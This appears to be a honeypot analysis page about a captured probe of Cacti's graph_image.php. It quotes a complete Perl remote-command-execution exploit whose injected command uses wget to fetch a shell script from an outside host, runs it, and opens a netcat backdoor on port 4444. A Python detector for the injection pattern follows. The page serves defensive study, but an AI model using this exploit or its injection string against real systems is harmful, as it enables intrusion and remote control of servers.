Daun

We get the following on port 80:

00000000  47 45 54 20 2f 63 61 63  74 69 2f 67 72 61 70 68  |GET /cacti/graph|
00000010  5f 69 6d 61 67 65 2e 70  68 70 20 48 54 54 50 2f  |_image.php HTTP/|
00000020  31 2e 31 0d 0a 41 63 63  65 70 74 3a 20 2a 2f 2a  |1.1..Accept: */*|
00000030  0d 0a 41 63 63 65 70 74  2d 4c 61 6e 67 75 61 67  |..Accept-Languag|
00000040  65 3a 20 65 6e 2d 75 73  0d 0a 41 63 63 65 70 74  |e: en-us..Accept|
00000050  2d 45 6e 63 6f 64 69 6e  67 3a 20 67 7a 69 70 2c  |-Encoding: gzip,|
00000060  20 64 65 66 6c 61 74 65  0d 0a 55 73 65 72 2d 41  | deflate..User-A|
00000070  67 65 6e 74 3a 20 4d 6f  7a 69 6c 6c 61 2f 34 2e  |gent: Mozilla/4.|
00000080  30 20 28 63 6f 6d 70 61  74 69 62 6c 65 3b 20 4d  |0 (compatible; M|
00000090  53 49 45 20 36 2e 30 3b  20 57 69 6e 64 6f 77 73  |SIE 6.0; Windows|
000000a0  20 39 38 29 0d 0a 48 6f  73 74 3a 20 XX XX XX XX  | 98)..Host: XXXX|
000000b0  XX XX XX XX XX XX XX XX  XX XX 0d 0a 43 6f 6e 6e  |XXXXXXXXXX..Conn|
000000c0  65 63 74 69 6f 6e 3a 20  43 6c 6f 73 65 0d 0a 0d  |ection: Close...|
000000d0  0a                                                |.|
000000d1
 

We guess this exploit was used.

# Note:
# This exploit contains backdoor shell code that is not located on this server.
# /str0ke 
 
#!/usr/bin/perl
#
# Remote Command Execution Exploit for Cacti <= 0.8.6d
#
# This exploit open a remote shell on the targets that uses Cacti
# TARGET HOST MUST BE A GNU/LINUX SERVER, if not:
# manual exploiting --> http://www.example.com/cacti/graph_image.php?local_graph_id=[valid_value]&graph_start=%0a[command]%0a
# Patch: download the last version http://www.cacti.net/download_cacti.php
# Discovered and Coded by Alberto Trivero
 
use LWP::Simple;
 
print "\n\t===============================\n";
print "\t= Exploit for Cacti <= 0.8.6d =\n";
print "\t=      by Alberto Trivero     =\n";
print "\t===============================\n\n";
 
if(@ARGV<2 or !($ARGV[1]=~m/\//)) {
   print "Usage:\nperl $0 [target] [path]\n\nExamples:\nperl $0 www.example.com /cacti/\n";
   exit(0);
}
 
$page=get("http://".$ARGV[0].$ARGV[1]."graph_view.php?action=list") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/local_graph_id=(.*?)&/ || die "[-] Unable to retrieve a value for local_graph_id";
print "[~] Sending exploiting request, wait for some seconds/minutes...\n";
get("http://".$ARGV[0].$ARGV[1]."graph_image.php?local_graph_id=$1&graph_start=%0acd /tmp;wget http://albythebest.altervista.org/shell.pl;chmod 777 shell.pl;perl shell.pl%0a");
print "[+] Exploiting request done!\n";
print "[*] Now try on your box: nc -v $ARGV[0] 4444\n";
 
# milw0rm.com [2005-06-22]

TODO:
determine normal Cacti behaviour, reply correctly, see what happens
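As an added example (not part of these notes or of Cacti), the following Python script shows how a honeypot or IDS could turn a hexdump like the one above back into the raw request, parse it, and classify it against the graph_image.php injection pattern described in the exploit header (a command wrapped in %0a in graph_start). The sample hexdump is the capture from this page, with the masked Host bytes ("XX") mapped to a placeholder byte; the rule that legitimate graph_start/graph_end values are integer Unix timestamps is a detection heuristic assumed here, not taken from Cacti's source.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample input: the honeypot's hexdump of the request seen on port 80,
# copied from the notes above (the masked Host bytes appear as "XX").
CAPTURE = """\
00000000  47 45 54 20 2f 63 61 63  74 69 2f 67 72 61 70 68  |GET /cacti/graph|
00000010  5f 69 6d 61 67 65 2e 70  68 70 20 48 54 54 50 2f  |_image.php HTTP/|
00000020  31 2e 31 0d 0a 41 63 63  65 70 74 3a 20 2a 2f 2a  |1.1..Accept: */*|
00000030  0d 0a 41 63 63 65 70 74  2d 4c 61 6e 67 75 61 67  |..Accept-Languag|
00000040  65 3a 20 65 6e 2d 75 73  0d 0a 41 63 63 65 70 74  |e: en-us..Accept|
00000050  2d 45 6e 63 6f 64 69 6e  67 3a 20 67 7a 69 70 2c  |-Encoding: gzip,|
00000060  20 64 65 66 6c 61 74 65  0d 0a 55 73 65 72 2d 41  | deflate..User-A|
00000070  67 65 6e 74 3a 20 4d 6f  7a 69 6c 6c 61 2f 34 2e  |gent: Mozilla/4.|
00000080  30 20 28 63 6f 6d 70 61  74 69 62 6c 65 3b 20 4d  |0 (compatible; M|
00000090  53 49 45 20 36 2e 30 3b  20 57 69 6e 64 6f 77 73  |SIE 6.0; Windows|
000000a0  20 39 38 29 0d 0a 48 6f  73 74 3a 20 XX XX XX XX  | 98)..Host: XXXX|
000000b0  XX XX XX XX XX XX XX XX  XX XX 0d 0a 43 6f 6e 6e  |XXXXXXXXXX..Conn|
000000c0  65 63 74 69 6f 6e 3a 20  43 6c 6f 73 65 0d 0a 0d  |ection: Close...|
000000d0  0a                                                |.|
000000d1
"""

# One "hexdump -C" style line: offset, hex pairs, then the |ascii| column.
HEX_LINE = re.compile(r"^[0-9a-fA-F]{8}\s+(.*?)\s*\|.*\|$")


def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild raw bytes from hexdump -C output; masked 'XX' bytes become b'X'."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line.strip())
        if not m:
            continue  # blank lines and the trailing offset-only line
        for tok in m.group(1).split():
            out += b"X" if tok.upper() == "XX" else bytes.fromhex(tok)
    return bytes(out)


def parse_request(raw: bytes) -> dict:
    """Split an HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


TIME_PARAMS = ("graph_start", "graph_end")
NUMERIC = re.compile(r"^-?\d+$")


def inspect_graph_request(target: str) -> list:
    """Classify a request target aimed at Cacti's graph_image.php.

    Heuristic assumed here (not from Cacti's source): legitimate graph_start /
    graph_end values are integer Unix timestamps, so a value carrying CR/LF is
    flagged as an injection attempt and any other non-numeric value as suspicious.
    """
    parts = urlsplit(target)
    findings = []
    if not parts.path.endswith("/graph_image.php"):
        return findings
    if not parts.query:
        findings.append("probe: graph_image.php requested without a query string")
        return findings
    params = parse_qs(parts.query, keep_blank_values=True)  # %0a is decoded to "\n"
    for name in TIME_PARAMS:
        for value in params.get(name, []):
            if "\n" in value or "\r" in value:
                findings.append(f"injection: newline in {name}={value!r}")
            elif not NUMERIC.match(value):
                findings.append(f"suspicious: non-numeric {name}={value!r}")
    return findings


def analyze_capture(dump: str) -> dict:
    """Full pipeline: hexdump -> bytes -> parsed request -> findings."""
    req = parse_request(hexdump_to_bytes(dump))
    req["findings"] = inspect_graph_request(req["target"])
    return req


if __name__ == "__main__":
    r = analyze_capture(CAPTURE)
    print(r["method"], r["target"], r["headers"].get("user-agent"))
    for finding in r["findings"]:
        print(" -", finding)
```

Run against the capture above, the script reports a bare request for graph_image.php with no query string at all, so the logged packet on its own is a probe for the file rather than the exploiting request; the newline check only fires once a graph_start value containing an encoded newline arrives.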

 
csni/shellcodes/daun.txt · Last modified: 2006/02/17 14:01
 